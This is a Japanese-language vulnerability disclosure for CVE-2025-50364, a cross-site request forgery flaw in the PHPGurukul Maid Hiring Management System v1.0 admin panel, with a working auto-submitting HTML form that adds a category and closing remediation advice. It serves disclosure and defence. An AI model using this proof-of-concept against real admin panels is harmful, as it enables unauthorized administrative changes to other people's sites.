
CVE-2025-50364(PHPGurukul Maid Hiring Management System v1.0)を標的とした概念実証(PoC)のCSRFエクスプロイト。細工されたHTMLフォームを介して任意の管理者カテゴリを追加します。
プロジェクト名とリポジトリURL: Maid Hiring Management System using PHP and MySQL
脆弱性タイプ: クライアントサイドリクエストフォージェリ
影響を受けるバージョン: v1.0
💣脆弱性の説明: PHPGurukul Hiring Management Systemの管理パネルにクロスサイトリクエストフォージェリ (CSRF) 脆弱性が存在します。これにより、攻撃者は認証済み管理者を悪意のあるサイトに誘導し、任意の採用カテゴリを追加できます。この脆弱性はデータの汚染や権限のない管理者レベルの変更を引き起こす可能性があります。
👩💻影響: 権限のないカテゴリ作成
🛜概念実証 (PoC)

/admin/add-category.php にPOSTリクエストを送信するHTMLコード
CSRF-POC

<html>
<body>
<form action="http://127.0.0.1/mhms/admin/add-category.php" method="POST">
<input type="hidden" name="catname" value="CSRF-POC" />
<input type="hidden" name="submit" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>


推奨事項: 管理フォームへのCSRFトークンの実装、SameSite Cookieの適用、リクエスト発信元の検証を実施し、不正な操作を防止してください。